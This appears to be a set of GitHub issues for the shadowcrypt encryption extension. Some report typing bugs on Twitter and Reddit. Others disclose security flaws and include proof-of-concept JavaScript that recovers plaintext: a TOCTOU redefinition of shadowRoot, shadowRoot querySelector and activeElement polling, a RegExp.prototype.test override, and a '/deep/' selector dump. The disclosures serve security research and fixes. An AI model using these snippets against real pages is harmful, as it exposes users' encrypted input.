
shadowcrypt's Issues

OS X Chrome, Twitter: Can't type

I can't type while the extension is enabled, making it unusable. It continuously goes out of focus. Lock icon is also very buggy.

Reddit keyboard bug

When submitting a text submission to Reddit with the extension enabled the arrow keys and the backspace key move/remove two characters for every key press. Here is a video showing this in action http://quick.as/ao2jcxq8.

TOCTOU bug. shadowRoot property modified _after_ node is added to the DOM tree.

This is less important, given that shadowRoot is no longer a property in recent versions of Chrome.

The protections of the content script should still be put in place on objects and prototypes before the application has a chance to use them.

inputBox.parentNode.removeChild(inputBox);
inputBox = inputBox.cloneNode();
Object.defineProperty(inputBox, "shadowRoot", {configurable: false});
parentBox.appendChild(inputBox);

The page code above makes the shadowRoot property non-configurable on the object before it is added to the DOM. The mutation observer in shadowcrypt (the one in charge of deleting that attribute) runs only after the element is added. Reconfiguration will fail.

It would be a good idea to make sure the properties being modified have the expected flags before they are modified.
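An added example, not shadowcrypt's own code, of the descriptor check recommended above, run in Node on plain objects standing in for DOM nodes (the hideProperty helper and the constructed nodes are assumptions): the hardening step inspects the property's flags before redefining it, so a page that pinned shadowRoot as non-configurable first is reported rather than silently winning.

```javascript
// hideProperty: the hardening step the extension would run on a node. It checks
// the descriptor flags first and refuses (instead of throwing) when an own,
// non-configurable descriptor is already there.
function hideProperty(target, name) {
  const own = Object.getOwnPropertyDescriptor(target, name);
  if (own && !own.configurable) {
    return { ok: false, reason: "non-configurable own property already present" };
  }
  Object.defineProperty(target, name, {
    configurable: false,
    enumerable: false,
    get() { return null; },
  });
  return { ok: true };
}

// Constructed stand-in for a DOM node whose shadowRoot would expose cleartext.
function freshNode() {
  return { shadowRoot: { secret: "cleartext" } };
}

// Expected path: the extension gets to the node first.
function hardenPristine() {
  const node = freshNode();
  const result = hideProperty(node, "shadowRoot");
  return { result, value: node.shadowRoot };
}

// TOCTOU path from the issue: page code pinned shadowRoot as non-configurable
// before the mutation observer ran. The check reports it; the value is untouched.
function hardenTampered() {
  const node = freshNode();
  Object.defineProperty(node, "shadowRoot", { configurable: false });
  const result = hideProperty(node, "shadowRoot");
  return { result, value: node.shadowRoot };
}

// Without the check, redefining the pinned property throws a TypeError; this is
// the "reconfiguration will fail" case. Returns true if that is what happens.
function naiveHideThrows() {
  const node = freshNode();
  Object.defineProperty(node, "shadowRoot", { configurable: false });
  try {
    Object.defineProperty(node, "shadowRoot", { get() { return null; } });
    return false;
  } catch (e) {
    return e instanceof TypeError;
  }
}
```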

Unencrypted value can be accessed with element.shadowRoot.querySelector or element.shadowRoot

I put a proof-of-concept at http://s.codepen.io/danielzfranklin/debug/YwvVVP.

If the browser supports it, element.shadowRoot.querySelector can be used to access the underlying element. It works in Chrome 48 but does not appear to be in the W3C standard. Otherwise, element.shadowRoot.activeElement can be polled until the input field is clicked on; activeElement is standardized in the spec at http://w3c.github.io/webcomponents/spec/shadow/#the-shadowroot-interface.

If var input = [an input element secured by shadowcrypt], the following code will try both methods to get the contents of the shadow input.

function found_shadow_input(shadow_input){
    // Do whatever on the DOM node of the shadow_input
    // attach listeners, log the value, etc.
}

function break_into_shadowroot(){
    if(input.shadowRoot.querySelector){
        // find using querySelector
        found_shadow_input(input.shadowRoot.querySelector("input.delegate"));
        console.log("found using querySelector");
    }
    else{
        // poll activeElement until the user clicks on the input
        var shadow_input_searcher = setInterval(function(){
            var potential_elem = input.shadowRoot.activeElement;

            if(potential_elem && potential_elem.nodeName === "INPUT" && potential_elem.classList.contains("delegate")){
                clearInterval(shadow_input_searcher);
                found_shadow_input(potential_elem);
                console.log("found using activeElement");
            }
        }, 10);
    }
}

if(input.shadowRoot){
    break_into_shadowroot();
}
else{
    // if the extension hasn't loaded yet we may need to wait a few milliseconds
    var shadowroot_check_interval = setInterval(function(){
        if(input.shadowRoot){
            clearInterval(shadowroot_check_interval);
            break_into_shadowroot();
        }
    }, 10);
}

element.shadowRoot.querySelector is read-only, so you can't monkeypatch it to fix this. What if you used something else instead of an input element? A span could have its contents accessed with .innerHTML, but a dirty canvas can't be read off of. If you watched for keypresses and wrote them to a canvas if they were alphanumeric/symbols, moved a fake blinking cursor on arrow key press, moved the cursor on mouse click, and deleted letters on delete key press, you could create a custom input element. If a clear pixel from a different domain was written in a corner, the canvas couldn't be read off of.

Page closure uses methods possibly overridden by page.

When the project is refactored to match Chrome's move from properties to getters on DOM objects, it should also be refactored to use methods local to the "within" closure.

It is currently possible for an adversarial page to modify prototype methods, such as RegExp.test to allow /deep/ selectors and get access to .delegate objects despite checks done inside shadowcrypt.

var originalTest = RegExp.prototype.test;
function allowDeep(str) {
    // The string must escape the backslashes: "/\/deep\/|>>>/" is just
    // "//deep/|>>>/" in JavaScript and would never equal the RegExp's toString().
    if (this.toString() === "/\\/deep\\/|>>>/") {
        return false;
    }
    // Every other RegExp keeps its normal behaviour.
    return originalTest.call(this, str);
}
RegExp.prototype.test = allowDeep;
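An added example, not shadowcrypt's own code, of the closure-local methods this issue asks for, run in Node: the within closure captures the built-in RegExp.prototype.exec before any page script runs (assumed, as for a content script injected at document start), and a later override of RegExp.prototype.test like the one above fools the naive check but not the captured one. The names deepCheck, installOverride and compare are assumptions.

```javascript
// Closure created at load time, before any page script runs, that keeps its
// own references to the built-ins it depends on.
const deepCheck = (function within() {
  const DEEP = /\/deep\/|>>>/;
  // Pristine RegExp.prototype.exec, captured before the page can replace it.
  // exec rather than test: the built-in test itself looks up this.exec, so a
  // captured test would still be fooled by an override of exec.
  const regexExec = Function.prototype.call.bind(RegExp.prototype.exec);
  return {
    // Resolves RegExp.prototype.test at call time, so it follows any override.
    naiveHasDeep(selector) { return DEEP.test(selector); },
    // Uses the captured built-in, unaffected by later prototype changes.
    safeHasDeep(selector) { return regexExec(DEEP, selector) !== null; },
  };
})();

// Simulates the issue's allowDeep override, installed after the closure exists.
// Returns a function that restores the original so the demo is repeatable.
function installOverride() {
  const original = RegExp.prototype.test;
  RegExp.prototype.test = function allowDeep(s) {
    if (this.toString() === "/\\/deep\\/|>>>/") return false;
    return original.call(this, s);
  };
  return function restore() { RegExp.prototype.test = original; };
}

// Runs both checks on a selector while the override is active.
function compare(selector) {
  const restore = installOverride();
  try {
    return { naive: deepCheck.naiveHasDeep(selector), safe: deepCheck.safeHasDeep(selector) };
  } finally {
    restore();
  }
}
```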

`body /deep/ span` reveals cleartext

The /deep/ combinator can cross the shadow boundary, allowing a host script read/write access to the same cleartext DOM presented to the user.

A parent application can easily get all ShadowCrypt cleartext on a page:

[].slice.call(document.querySelectorAll('body /deep/ span'))
.map(function(el) {
  return el.innerText
}).join('\n')

Not sure there's a way around it at this point.
